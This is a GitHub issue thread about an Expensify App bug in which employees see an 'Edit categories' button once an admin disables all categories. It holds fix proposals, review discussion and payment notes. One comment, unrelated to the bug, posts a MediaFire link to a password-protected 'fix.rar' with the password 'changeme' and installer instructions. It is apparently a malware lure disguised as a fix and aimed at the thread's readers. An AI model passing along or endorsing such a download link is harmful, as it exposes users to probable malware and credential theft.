### ISSUE TITLE
[$250] Categories - Employee has the option to edit categories when all the categories are disabled

### ISSUE THREAD

**Issue by lanitochka17** [Expensify/App#48097] opened 2024-08-27 14:42 UTC
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.25-1
**Reproducible in staging?:** Y
**Reproducible in production?:** Y
**If this was caught during regression testing, add the test name, ID and link from TestRail:** https://expensify.testrail.io/index.php?/tests/view/4895538
**Email or phone of affected tester (no customers):** applausetester+kh050806@applause.expensifail.com
**Issue reported by:** Applause - Internal Team

## Action Performed:
Precondition:
- Admin and employee are in the same workspace
1. Go to staging.new.expensify.com
2. [Employee] Go to workspace chat
3. [Employee] Click + > Submit expense > Manual
4. {Employee] Enter amount > Next
5. [Employee] Click Category on the confirmation page
6. [Admin] Disable all the categories

## Expected Result:
Category page will turn to not here page for employee after admin disables all the categories

## Actual Result:
Category page turns to empty state page with Edit categories button for employee which leads to not here page

## Workaround:
Unknown

## Platforms:

Which of our officially supported platforms is this issue occurring on?
- [ ] Android: Native
- [ ] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [x] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

Add any screenshot/video evidence

</details> 

https://github.com/user-attachments/assets/80e116b4-6e1a-496c-a5e0-00a326065905

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~01775966fb678bc1d8</li>
        <li>Upwork Job ID: 1828566383512584614</li>
        <li>Last Price Increase: 2024-08-27</li>
<li>Automatic offers: </li>
<ul>
<li>DylanDylann | Reviewer | 103734142</li>
<li>nkdengineer | Contributor | 103734143</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @DylanDylann</details>

**Comment by lanitochka17** [comment] 2024-08-27 14:42
@stephanieelliott  FYI I haven't added the External label as I wasn't 100% sure about this issue. Please take a look and add the label if you agree it's a bug and can be handled by external contributors

**Comment by lanitochka17** [comment] 2024-08-27 14:43
We think that this bug might be related to #wave-collect - Release 1

**Comment by akshsekhr2702** [comment] 2024-08-27 14:53
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by FitseTLT** [comment] 2024-08-27 14:53
## Proposal

### Please re-state the problem that we are trying to solve in this issue.
Categories - Employee has the option to edit categories when all the categories are disabled

### What is the root cause of that problem?
We are not checking if the user can update category when we display empty state section here
https://github.com/Expensify/App/blob/0fd1de0f279fffba0129484801942c3bddb148da/src/pages/iou/request/step/IOURequestStepCategory.tsx#L170-L173
### What changes do you think we should make in order to solve the problem?

We can check if the user is admin before displaying the empty section
https://github.com/Expensify/App/blob/0fd1de0f279fffba0129484801942c3bddb148da/src/pages/iou/request/step/IOURequestStepCategory.tsx#L114
```
    const shouldShowEmptyState = !isLoading && !shouldShowCategory && isPolicyAdmin(policy);

```
### What alternative solutions did you explore? (Optional)

**Comment by nkdengineer** [comment] 2024-08-27 14:57
## Proposal

### Please re-state the problem that we are trying to solve in this issue.
Category page turns to empty state page with Edit categories button for employee which leads to not here page

### What is the root cause of that problem?
We always show the edit category button even the user is not an admin of the workspace

https://github.com/Expensify/App/blob/6ca91cddfbb4bbcd0ca24c9f10549057b6fd7332/src/pages/iou/request/step/IOURequestStepCategory.tsx#L179
### What changes do you think we should make in order to solve the problem?
We can use `isPolicyAdmin` function to check whether the user is an admin or not then use it to show the edit category button or we can add `disabled` prop for this button with `isPolicyAdmin` check.

```
PolicyUtils.isPolicyAdmin(policy) && (
    // Edit category button
)
```
OPTIONAL: We can display another message like `Ask the admin to edit the category` 
We should still show the empty state component
### What alternative solutions did you explore? (Optional)

**Comment by nkdengineer** [comment] 2024-08-27 15:01
Updated [proposal](https://github.com/Expensify/App/issues/48097#issuecomment-2312801012)

- Add alternative solution

**Comment by stephanieelliott** [comment] 2024-08-27 22:55
Yea I agree this is not working as expected, there is a delay in hiding the categories once they are disabled.

**Comment by DylanDylann** [comment] 2024-08-29 09:59
Thanks everyone, @FitseTLT and @Krishna2323 have the same idea of displaying the not found page. But I prefer to display an empty view as suggested by @nkdengineer. I think we can hide the "Edit category" or update the button text to something like "Got it",... (maybe this will need to be confirmed in the PR phase)

Let's go with @nkdengineer's [proposal](https://github.com/Expensify/App/issues/48097#issuecomment-2312801012)

🎀 👀 🎀 C+ reviewed

**Comment by DylanDylann** [comment] 2024-08-30 17:44
@carlosmiceli I see the behavior on other pages is different. With the same step
- On Tag page: we display not found page
- On Report field page: we display nothing 
- On Category page (this issue): We are going to display empty view

Should we adjust all these pages to make it consistent

**Comment by carlosmiceli** [comment] 2024-08-30 23:23
@DylanDylann that's a good point, we should (I think). Let me get back on this. I think for now we should proceed fixing the issue as originally proposed, and we'll create another issue for standardizing those pages if we want.

**Comment by carlosmiceli** [comment] 2024-09-01 16:20
@DylanDylann I'm not being able to reproduce this for Tags for example, it continues to display the Tags until the user reloads the app. Could you show me a video of how you get to each empty screen for Tags and Reports? Thank you!

**Comment by DylanDylann** [comment] 2024-09-04 09:54
@carlosmiceli Sorry for my delay. I test in the same admin account and using two chrome tab


https://github.com/user-attachments/assets/290af9b7-2e30-42e2-8a15-a13767588a17


cc @nkdengineer Could you help to verify the output when login in the 2 account as in the OP with Tag and report field

**Comment by stephanieelliott** [comment] 2024-09-11 02:41
This PR should be merged with today's deploy 🎉

**Comment by DylanDylann** [comment] 2024-09-24 04:20
@stephanieelliott Please help process payment for me, thanks

**Comment by stephanieelliott** [comment] 2024-09-24 21:44
Oops, yes looks like the automation didn't work -- PR was deployed to prod on 9/19 with https://github.com/Expensify/App/issues/48791. Setting up for payment now.

**Comment by stephanieelliott** [comment] 2024-09-24 21:47
Summarizing payment on this issue: 

 - Contributor: @nkdengineer $250 via Upwork -- PAID 
 - Contributor+: @DylanDylann $250 via Upwork -- PAID 

 Upwork job is here: https://www.upwork.com/jobs/~01775966fb678bc1d8

**Closed by stephanieelliott** 2024-09-24 21:47 UTC
Labels: Reviewing, External, Weekly, Bug
